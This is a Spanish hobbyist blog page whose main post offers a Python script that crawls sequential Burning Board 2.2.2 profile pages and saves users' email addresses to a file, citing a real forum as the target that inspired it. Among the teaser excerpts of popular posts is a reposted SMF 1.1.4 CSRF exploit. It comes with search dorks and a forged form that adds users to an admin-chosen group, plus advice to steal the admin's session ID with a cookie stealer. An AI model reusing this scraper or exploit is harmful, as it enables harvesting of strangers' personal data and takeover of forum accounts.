Ir al contenido principal

Burning Board 2.2.2 mail xtrakt0r

Bueno, el día de hoy estaba de ocioso, me aburri de programar un sistema en el que ando y me puse a programar un extractor de mails con python, creo que si es un poco mas rápida la ejecución de codigo que con php, aparte que hace rato no hacia nada con python, entonces pues no esta mal de vez en cuando :P

El código es sencillo, espero les guste y les sirva de algo, en caso de que no, al menos se haya entretenido leyendo el parrafo anterior! xD :P

Imagen de como se ve:




#inicio del code --------------


#/usr/local/bin/python
# -*- coding: utf-8 -*-
import os
import urllib
import string
import re
import sys
import time
import datetime
import random
t0 = time.clock()
correito = re.compile('([\w\-\.]+@(\w[\w\-]+\.)+[\w\-]+)')
print 'Burning Board 2.2.2 mail xtrakt0r'
print '------------Komtec1--------------'
print '-----komtec1[at]gmail[dot]com----'
print '\n Ingresa el nombre con el que vas a guardar el archivo'
nombre = raw_input("")
print '\n Ingresa la url completa ej: http://sitio.com/forums/profile.php?userid='
url = raw_input("")
print '\ Ingresa el numero inicial, si lo dejas en blanco comienza en 1'
inicial = raw_input("")
if inicial == '':
    inicial = 0
print 'Si sabes el numero final de usuarios ingresalo, o ingresa el numero maximo de intentos Ej: 315000'
usuarios = raw_input("")
print 'Espera un momento, el script se esta ejecutando'
if usuarios == '':
    print 'Voy a sacar el numero de usuarios    '
else:
    for x in range(int(inicial), int(usuarios)):
        mail = ''
        urlf = url + str(x)
        chek = urllib.urlopen(urlf)
        chek2 = chek.read()
        if x%100 == 0:
            print x
        if chek2.find("This address/url is invalid. If you clicked on a link, please inform the") >= 0:
            mail = ''
        else:
            mail = correito.findall(chek2)
            if len(mail) == 1:
                f = open (nombre+".txt", "a")
                f.write(str(mail) + '\n')
                f.close()
                print mail
             
print "%.2f sec" % (time.clock() - t0)




#fin del code ------

les dejo el enlace por cualquier cosa:  


http://pastebin.com/3bqTaTfU


No esta de más mencionar que el codigo va a servir cuando en el servidor el correo se muestre, por ejemplo aqui: 


http://www.romnation.net/forums/profile.php?userid=215204


De hecho esa página fue la "inspiradora" para hacer el codigo xD :P 


Saludos!!!  :D :D :D :D 

PD: Ya hice dos modificaciones al codigo! :D (20:25 -  13/01/2012)


Komtec1

Comentarios

Entradas populares de este blog

Solución [fix] a hamachi Logging in .. failed, busy

Hola!

Aquí con una pequeña entrada, pero que a más de uno le será útil.

Tengo hamachi instalado en varias máquinas, pero en una precisamente al reiniciar, algunas veces me da este problema:

usuarioserver@server:~$ sudo hamachi login
[sudo] password for usuarioserver:
Logging in .. failed, busy

Lo busqué en internet y la "solución" que dan, es reinstalar hamachi, y para los que han instalado hamachi en ubuntu, saben que no es una opción, pues se tendrían que hacer estos pasos: 
sudo apt-get remove logmein-hamachi sudo dpkg -i logmein-hamachixxx.deb sudo apt-get install -f
Para lo cual (siempre) es molesto hacer esos pasos, y algunas veces la configuración se llega a perder. 
Para solucionar ese problema, basta con hacer un: 
sudo /etc/init.d/logmein-hamachi force-reload
Esto forzará el reinicio de hamachi, y así después hacen: 
sudo hamachi login
Y listo, el problema de failed busy desaparece y los deja loguear bien en la red de hamachi. 
Espero les sirva! :D 
Saludos 
Komtec…

Integrar API de Google Maps, archivos kml, kmz y otras fumarolas :D

Ya que andamos en eso de la posteada ahora les voy a dejar un pequeño manual sobre como integrar la API de maps (google) dentro de nuestro código, hay varia documentación en la página developers de google, pero realmente lo que uno busca cuando pone en google: "integrar api de maps" es ver un ejemplo claro y directo para que se pueda entender de mejor forma.

Así que pues ya comentada la información de arriba les paso a dejar un ejemplo.

Lo primero que tenemos que poner en nuestro código es la llamada a la API de maps:


<script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?sensor=false&language=es"></script>En este caso la variable sensor está en false, esto nos indica que no hay un dispositivo gps que pueda tomar la ubicación (se pone generalmente en true cuando es para aplicación movil, llámese celular o tableta)El lenguaje declaramos español, esto es para los menús que se van a mostrar en el mapa. Una vez que tenemo…

SMF 1.1.4 - Add User In Group [CSRF]

Bueno en primera este post lo saque de remoteexecution.es el link es este:

http://www.remoteexecution.es/foro/index.php?topic=879

Dork: "SMF 1.1.4"
Dork (SID): inurl:index.php inurl:sid= "SMF 1.1.4"


< h t m l >
< h e a d >
< b o d y >
< action="http://adress.com/path/index.php?action=membergroups;sa=members;group=GroupID" method="post" type="text" name="toAdd" id="toAdd" size="30">
< type="submit" name="add" value="Add Members">
< type="hidden" name="sc" value="ADMIN SESSION ID">
< /form>
< /body>
< /html>

o si no tambien se puede usar

forum/path/index.php?action=membergroups;sa=members;group=groupid;toAdd=usertoadd&add=Add+Members&sc=sid
by Syntacks!

Todo lo que usted necesita es administrador identificación de la sesión (SID), intentan engañar a los admin (utilizando cookie stealer etc ..)

|| …